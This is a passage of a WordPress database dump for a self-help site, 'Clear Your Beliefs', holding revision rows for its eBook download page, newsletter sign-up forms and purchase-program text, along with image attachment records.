(2063, 2, '2014-12-29 23:05:03', '2014-12-30 04:05:03', '&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nHere''s your eBook in PDF format:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="aligncenter size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a>\r\n\r\n&nbsp;\r\n<p style="text-align: center;">Click the link below to open the eBook, or right-click and "Save As..." to your computer:</p>\r\n\r\n<h3 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h3>', 'CYB-eBook', '', 'inherit', 'closed', 'open', '', '2061-revision-v1', '', '', '2014-12-29 23:05:03', '2014-12-30 04:05:03', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1', 0, 'revision', '', 0),
(2064, 2, '2014-12-29 23:05:53', '2014-12-30 04:05:53', '&nbsp;\r\n<h3 style="text-align: center;"><strong>Here''s your eBook in PDF format:</strong></h3>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="aligncenter size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a>\r\n\r\n&nbsp;\r\n<p style="text-align: center;">Click the link below to open the eBook, or right-click and "Save As..." to your computer:</p>\r\n\r\n<h3 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h3>', 'CYB-eBook', '', 'inherit', 'closed', 'open', '', '2061-revision-v1', '', '', '2014-12-29 23:05:53', '2014-12-30 04:05:53', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1', 0, 'revision', '', 0),
(2065, 2, '2014-12-29 23:07:06', '2014-12-30 04:07:06', '&nbsp;\r\n<h1 style="text-align: center;"><strong>Here''s your eBook in PDF format:</strong></h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="size-medium wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a>\r\n\r\n&nbsp;\r\n<p style="text-align: center;"><strong>Click the link below to open the eBook, </strong></p>\r\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\r\n\r\n<h3 style="text-align: center;"> <a href="http://s3-us-west-2.amazonaws.com/cyb/Clear Your Beliefs eBook V6 2018.pdf">Clear Your Beliefs eBook v.4.0</a></h3>', 'CYB-eBook', '', 'inherit', 'closed', 'open', '', '2061-revision-v1', '', '', '2014-12-29 23:07:06', '2014-12-30 04:07:06', '', 2061, 'http://clearyourbeliefs.com/2061-revision-v1', 0, 'revision', '', 0),
(2066, 2, '2018-04-17 19:09:24', '2018-04-18 00:09:24', '&nbsp;\n\n&nbsp;\n<p style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2.png"><img class="size-medium wp-image-1476" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" /></a></p>\n&nbsp;\n<h1 style="text-align: center;"> Here''s your eBook in PDF format:</h1>\n<p style="text-align: center;"><strong>Click the link below to open the eBook</strong></p>\n<p style="text-align: center;"><strong>or right-click and "Save As..." to your computer:</strong></p>\n\n<h1 style="text-align: center;"> <a href="https://s3-us-west-2.amazonaws.com/cyb/Clear+Your+Beliefs+eBook+V6+2018.pdf">Clear Your Beliefs eBook v.6.0</a></h1>', 'CYB-eBook PROMISE', '', 'inherit', 'closed', 'open', '', '2061-autosave-v1', '', '', '2018-04-17 19:09:24', '2018-04-18 00:09:24', '', 2061, 'http://clearyourbeliefs.com/2061-autosave-v1', 0, 'revision', '', 0),
(546, 4194, '2014-05-09 08:44:29', '2014-05-09 13:44:29', 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-beliefCloset_icon_PRINT_wh.jpg', 'cropped-beliefCloset_icon_PRINT_wh.jpg', '', 'inherit', 'closed', 'open', '', 'cropped-beliefcloset_icon_print_wh-jpg', '', '', '2014-05-09 08:44:29', '2014-05-09 13:44:29', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-beliefCloset_icon_PRINT_wh.jpg', 0, 'attachment', 'image/jpeg', 0),
(547, 4194, '2014-05-09 09:10:57', '2014-05-09 14:10:57', 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg.jpg', 'cropped-header-bg.jpg', '', 'inherit', 'closed', 'open', '', 'cropped-header-bg-jpg', '', '', '2014-05-09 09:10:57', '2014-05-09 14:10:57', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg.jpg', 0, 'attachment', 'image/jpeg', 0),
(551, 4194, '2014-05-09 09:43:16', '2014-05-09 14:43:16', 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg1.jpg', 'cropped-header-bg1.jpg', '', 'inherit', 'closed', 'open', '', 'cropped-header-bg1-jpg', '', '', '2014-05-09 09:43:16', '2014-05-09 14:43:16', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg1.jpg', 0, 'attachment', 'image/jpeg', 0),
(587, 4194, '2014-05-16 12:19:41', '2014-05-16 17:19:41', '', 'Buy the program &nbsp;&nbsp;alone', 'Buy the program alone', 'inherit', 'closed', 'open', '', '96-autosave-v1', '', '', '2014-05-16 12:19:41', '2014-05-16 17:19:41', '', 96, 'http://beliefcloset.com/cyb/96-autosave-v1', 0, 'revision', '', 0),
(588, 4194, '2014-05-16 17:23:26', '2014-05-16 22:23:26', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<p><div class=''embed-container''><center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div></p>\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'publish', 'closed', 'open', '', 'free-ebook', '', '', '2015-05-29 12:30:34', '2015-05-29 17:30:34', '', 0, 'http://beliefcloset.com/cyb/?page_id=588', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2195, 2, '2015-05-29 12:29:18', '2015-05-29 17:29:18', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<p><div class=''embed-container''><center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div></p>\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'open', 'open', '', '588-revision-v1', '', '', '2015-05-29 12:29:18', '2015-05-29 17:29:18', '', 588, 'http://clearyourbeliefs.com/588-revision-v1/', 0, 'revision', '', 0),
(589, 4194, '2014-05-16 17:23:26', '2014-05-16 22:23:26', '<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input type="hidden" name="inf_form_xid" value="fce61116f5a9a85d3022cf39699950ce" />\r\n<input type="hidden" name="inf_form_name" value="CYB Newsletter Sign Up" />\r\n<input type="hidden" name="infusionsoft_version" value="1.29.11.21" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input class="infusion-field-input-container" id="inf_field_FirstName" type="text" name="inf_field_FirstName" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input class="infusion-field-input-container" id="inf_field_Email" type="text" name="inf_field_Email" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Submit" /></div>\r\n</form>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-05-16 17:23:26', '2014-05-16 22:23:26', '', 588, 'http://beliefcloset.com/cyb/588-revision-v1', 0, 'revision', '', 0),
(590, 4194, '2014-05-16 17:24:20', '2014-05-16 22:24:20', 'Thank you for signing up for the Clear Your Beliefs newsletter.', 'Thank You', '', 'publish', 'closed', 'open', '', 'thank-you', '', '', '2014-05-16 17:24:20', '2014-05-16 22:24:20', '', 0, 'http://beliefcloset.com/cyb/?page_id=590', 0, 'page', '', 0),
(591, 4194, '2014-05-16 17:24:20', '2014-05-16 22:24:20', 'Thank you for signing up for the Clear Your Beliefs newsletter.', 'Thank You', '', 'inherit', 'closed', 'open', '', '590-revision-v1', '', '', '2014-05-16 17:24:20', '2014-05-16 22:24:20', '', 590, 'http://beliefcloset.com/cyb/590-revision-v1', 0, 'revision', '', 0),
(702, 4194, '2014-06-09 17:45:01', '2014-06-09 22:45:01', '', '15dayguar', '', 'inherit', 'closed', 'open', '', '15dayguar', '', '', '2014-06-09 17:45:01', '2014-06-09 22:45:01', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg', 0, 'attachment', 'image/jpeg', 0),
(716, 4194, '2014-06-12 12:42:07', '2014-06-12 17:42:07', '', 'Scholarships', '', 'publish', 'closed', 'open', '', 'scholarships', '', '', '2014-06-12 12:42:07', '2014-06-12 17:42:07', '', 0, 'http://clearyourbeliefs.com/?page_id=716', 0, 'page', '', 0),
(717, 4194, '2014-06-12 12:42:07', '2014-06-12 17:42:07', '', 'Scholarships', '', 'inherit', 'closed', 'open', '', '716-revision-v1', '', '', '2014-06-12 12:42:07', '2014-06-12 17:42:07', '', 716, 'http://clearyourbeliefs.com/716-revision-v1', 0, 'revision', '', 0),
(738, 4194, '2014-06-12 16:39:37', '2014-06-12 21:39:37', '', 'divider', '', 'inherit', 'closed', 'open', '', 'divider', '', '', '2014-06-12 16:39:37', '2014-06-12 21:39:37', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/divider.jpg', 0, 'attachment', 'image/jpeg', 0),
(741, 4194, '2014-06-12 16:47:20', '2014-06-12 21:47:20', '', 'divider', '', 'inherit', 'closed', 'open', '', 'divider-2', '', '', '2014-06-12 16:47:20', '2014-06-12 21:47:20', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/divider.gif', 0, 'attachment', 'image/gif', 0),
(746, 4194, '2014-06-12 17:11:58', '2014-06-12 22:11:58', '', 'divider', '', 'inherit', 'closed', 'open', '', 'divider-3', '', '', '2014-06-12 17:11:58', '2014-06-12 22:11:58', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/divider1.gif', 0, 'attachment', 'image/gif', 0),
(747, 4194, '2014-06-12 17:15:27', '2014-06-12 22:15:27', '', 'line', '', 'inherit', 'closed', 'open', '', 'line', '', '', '2014-06-12 17:15:27', '2014-06-12 22:15:27', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/line.png', 0, 'attachment', 'image/png', 0),
(755, 4194, '2014-06-12 18:02:12', '2014-06-12 23:02:12', '', 'shell', '', 'inherit', 'closed', 'open', '', 'shell', '', '', '2014-06-12 18:02:12', '2014-06-12 23:02:12', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell.jpg', 0, 'attachment', 'image/jpeg', 0),
(756, 4194, '2014-06-12 18:03:50', '2014-06-12 23:03:50', '', 'shell', '', 'inherit', 'closed', 'open', '', 'shell-2', '', '', '2014-06-12 18:03:50', '2014-06-12 23:03:50', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1.jpg', 0, 'attachment', 'image/jpeg', 0),
(768, 4194, '2014-06-15 06:43:38', '2014-06-15 11:43:38', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\n\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\n\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\n\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\n<div class="icon_box">\n\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\n<div class="infusion-field" style="text-align: right;"></div>\n<div class="infusion-submit" style="text-align: right;"><input type="submit" value="Submit" style /></div>\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-autosave-v1', '', '', '2014-06-15 06:43:38', '2014-06-15 11:43:38', '', 588, 'http://clearyourbeliefs.com/588-autosave-v1', 0, 'revision', '', 0),
(769, 4194, '2014-06-12 19:11:54', '2014-06-13 00:11:54', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h3 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h3>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Submit" /></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-12 19:11:54', '2014-06-13 00:11:54', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(781, 4194, '2014-06-12 21:28:47', '2014-06-13 02:28:47', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Buy the program &nbsp;&nbsp;alone', 'Buy the program alone', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-12 21:28:47', '2014-06-13 02:28:47', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(785, 4194, '2014-06-12 21:34:15', '2014-06-13 02:34:15', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Buy the program &nbsp;&nbsp;alone', 'Buy the program alone', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-12 21:34:15', '2014-06-13 02:34:15', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(782, 4194, '2014-06-12 21:31:46', '2014-06-13 02:31:46', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Buy the program &nbsp;&nbsp;alone', 'You’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-12 21:31:46', '2014-06-13 02:31:46', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(784, 4194, '2014-06-12 21:33:43', '2014-06-13 02:33:43', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Buy the program &nbsp;&nbsp;alone', 'You’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-12 21:33:43', '2014-06-13 02:33:43', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(783, 4194, '2014-06-12 21:32:11', '2014-06-13 02:32:11', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Purchase the Clear Your Beliefs Program', 'You’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-12 21:32:11', '2014-06-13 02:32:11', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(786, 4194, '2014-06-12 21:34:44', '2014-06-13 02:34:44', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Purchase the Clear Your Beliefs Program', 'Purchase the Clear Your Beliefs Program', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-12 21:34:44', '2014-06-13 02:34:44', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(862, 4194, '2014-06-15 06:33:44', '2014-06-15 11:33:44', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Submit" /></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:33:44', '2014-06-15 11:33:44', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(863, 4194, '2014-06-15 06:35:07', '2014-06-15 11:35:07', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box"><input name="infusionsoft_version" type="hidden" value="1.29.11.21" />&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Submit" /></div>\r\n</div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:35:07', '2014-06-15 11:35:07', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(864, 4194, '2014-06-15 06:36:47', '2014-06-15 11:36:47', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n\r\n&nbsp;\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"></div>\r\n<div class="infusion-submit" style="text-align: center;"><input type="submit" value="Submit" /></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-06-15 06:36:47', '2014-06-15 11:36:47', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(865, 4194, '2014-06-15 06:38:19', '2014-06-15 11:38:19', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box"><input name="infusionsoft_version" type="hidden" value="1.29.11.21" />&nbsp;\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div 